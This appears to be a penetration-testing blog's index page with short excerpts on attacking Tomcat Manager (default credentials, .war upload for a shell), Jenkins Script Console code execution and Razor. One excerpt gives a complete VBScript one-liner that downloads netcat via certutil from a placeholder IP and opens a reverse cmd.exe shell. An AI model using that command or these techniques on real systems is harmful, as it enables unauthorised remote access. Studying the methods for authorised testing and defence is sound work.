White Box Testing Tomcat and Struts

Tomcat is always an easy target and low hanging fruit in a pentest and I always aim to scan the network for port 8080 as tomcat runs by default on this port. If you are lucky enough, you can login to the “Manager App” with default credentials and upload a .war file to get shell … Read moreWhite Box Testing Tomcat and Struts

Visual Basic Reverse Shell

VBS reverse shell This little .vbs file will download netcat to the system using certutil.exe and then will give a reverse shell. Dim objShell:Set objShell = WScript.CreateObject("WScript.Shell"):objShell.Run "cmd/K certutil.exe -urlcache -split -f http://IP/nc.exe C:\users\administrator\Desktop\nc.exe & C:\users\administrator\Desktop\nc.exe -e cmd.exe IP Port":Set objShell = Nothing

White Box Testing Jenkins

I generally install vulnerable web applications to my 64bit Ubuntu 16.04 machine to better understand the structure of the web applications and vulnerabilities. It is more like white-box approach. If you don’t know well about the web application you are auditing, you can easily get familiar with this method. In this post, I am going … Read moreWhite Box Testing Jenkins

Jenkins Script Console Code Exec & Reverse Shell & Java Deserialization

You can often come across with Jenkins Script Console without any authentication.Here you can find the some code execution scripts which can help you to run some commands and even get a reverse shell depending on the Operating System version. Jenkins Code Execution via Script Console Getting Reverse Shell on Linux Machine We can simply … Read moreJenkins Script Console Code Exec & Reverse Shell & Java Deserialization

ASP Razor Basic Code Execution

What is Razor ? Razor is a markup syntax that lets you embed server-based code (Visual Basic and C#) into web pages. Razor is based on ASP.NET, and designed for creating web applications. It has the power of traditional ASP.NET markup, but it is easier to use, and easier to learn. For more information, please … Read moreASP Razor Basic Code Execution